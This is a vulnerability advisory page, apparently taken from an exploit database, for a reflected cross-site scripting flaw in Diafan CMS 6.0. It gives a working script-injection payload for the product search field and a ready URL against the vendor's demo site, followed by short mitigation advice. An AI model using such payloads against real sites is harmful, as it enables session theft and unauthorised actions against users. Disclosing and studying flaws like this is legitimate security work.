header-logo
Suggest Exploit
vendor:
Diafan CMS
by:
tmrswrr / Hulya Karabag
5.5
CVSS
MEDIUM
Reflected Cross-Site Scripting (XSS)
79
CWE
Product Name: Diafan CMS
Affected Version From: 6
Affected Version To: 6
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: https://demo.diafancms.com

Diafan CMS 6.0 – Reflected Cross-Site Scripting (XSS)

The Diafan CMS version 6.0 is vulnerable to a reflected cross-site scripting (XSS) attack. This can be exploited by an attacker by injecting malicious script code into the 'Search in the goods > Article' field on the main page of the CMS. When a user interacts with the injected payload, it will execute the script code in the user's browser, potentially leading to unauthorized actions or data theft. An example payload that triggers an alert with the document domain is provided: "><script>alert(document.domain)<%2Fscript>

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before displaying it on the website. Implementing proper input validation and output encoding can prevent the execution of malicious script code.
Source

Exploit-DB raw data:

# Exploit Title: Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)
# Exploit Author: tmrswrr / Hulya Karabag
# Vendor Homepage: https://www.diafancms.com/
# Version: 6.0
# Tested on: https://demo.diafancms.com


Description:

1) https://demo.diafancms.com/ Go to main page and write your payload in Search in the goods > Article field:
Payload : "><script>alert(document.domain)<%2Fscript>
2) After will you see alert button : 
https://demo.diafancms.com/shop/?module=shop&action=search&cat_id=0&a=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pr1=0&pr2=0